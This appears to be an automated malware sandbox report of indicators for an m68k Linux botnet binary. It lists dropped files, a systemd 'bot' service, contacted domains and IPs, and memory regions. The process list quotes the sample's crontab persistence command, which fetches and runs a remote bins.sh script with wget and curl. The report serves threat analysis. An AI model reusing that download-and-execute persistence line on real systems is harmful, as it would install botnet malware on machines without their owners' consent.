IOC Report
m68k.elf

loading gif

Files

File Path
Type
Category
Malicious
m68k.elf
ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
initial sample
malicious
/root/.bashrc
ASCII text
dropped
malicious
/var/spool/cron/crontabs/tmp.aHD8f7
ASCII text
dropped
malicious
/memfd:snapd-env-generator (deleted)
ASCII text
dropped
/usr/lib/systemd/system/bot.service
ASCII text
dropped

Processes

Path
Cmdline
Malicious
/tmp/m68k.elf
/tmp/m68k.elf
/tmp/m68k.elf
-
/tmp/m68k.elf
-
/tmp/m68k.elf
-
/tmp/m68k.elf
-
/tmp/m68k.elf
-
/bin/sh
sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
/bin/sh
-
/bin/sh
-
/usr/bin/crontab
crontab -l
/bin/sh
-
/usr/bin/chmod
chmod +x bins.sh
/bin/sh
-
/usr/bin/sh
sh bins.sh
/bin/sh
-
/bin/curl
/bin/curl -k -L --output bins.sh http://serverip/bins/bins.sh
/bin/sh
-
/usr/bin/chmod
chmod +x bins.sh
/usr/bin/sh
sh bins.sh
/bin/sh
-
/usr/bin/crontab
crontab -
/tmp/m68k.elf
-
/bin/sh
sh -c "/bin/systemctl enable bot"
/bin/sh
-
/bin/systemctl
/bin/systemctl enable bot
/usr/lib/systemd/systemd
-
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/bin/dash
-
/usr/bin/rm
rm -f /tmp/tmp.6b53om6RKI /tmp/tmp.EtDL4UQkeS /tmp/tmp.Ky8z6sLpsb
/usr/bin/dash
-
/usr/bin/rm
rm -f /tmp/tmp.6b53om6RKI /tmp/tmp.EtDL4UQkeS /tmp/tmp.Ky8z6sLpsb
There are 21 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://serverip/bins/bins.sh
unknown
http://serverip/bins/bins.sh;
unknown

Domains

Name
IP
Malicious
cdn.fwupd.org
unknown
host.zopz-api.com
unknown

IPs

IP
Domain
Country
Malicious
34.249.145.219
unknown
United States
109.202.202.202
unknown
Switzerland
91.189.91.43
unknown
United Kingdom
91.189.91.42
unknown
United Kingdom

Memdumps

Base Address
Regiontype
Protect
Malicious
7f70acf0e000
page read and write
7f70acd98000
page read and write
7f70abbc6000
page read and write
55c185030000
page read and write
7f70aca28000
page read and write
55c182f93000
page read and write
7f7024020000
page read and write
7f70a4000000
page read and write
7f70acd98000
page read and write
7f70acf0e000
page read and write
7f70a4000000
page read and write
7f7024016000
page read and write
7f70aca4d000
page read and write
7f70ac3d7000
page read and write
7f70acec9000
page read and write
55c1868df000
page read and write
55c184f99000
page execute and read and write
7ffc52a77000
page read and write
7f7024016000
page read and write
7f702401e000
page read and write
7f70ac3c9000
page read and write
55c184f99000
page execute and read and write
7f70ac3c9000
page read and write
7f702401e000
page read and write
7f70acec1000
page read and write
55c182f9b000
page read and write
7f7024014000
page execute read
7f70aca4d000
page read and write
7f70aca28000
page read and write
7f70acec1000
page read and write
55c185030000
page read and write
7f70ac666000
page read and write
7f70ac666000
page read and write
7f7024014000
page execute read
7f70a4021000
page read and write
55c182d61000
page execute read
55c182f9b000
page read and write
7ffc52ac4000
page execute read
7f70abbc6000
page read and write
55c182d61000
page execute read
7ffc52ac4000
page execute read
7ffc52a77000
page read and write
7f70acec9000
page read and write
55c182f93000
page read and write
7f70ac3d7000
page read and write
7f70a4021000
page read and write
55c1868df000
page read and write
There are 37 hidden memdumps, click here to show them.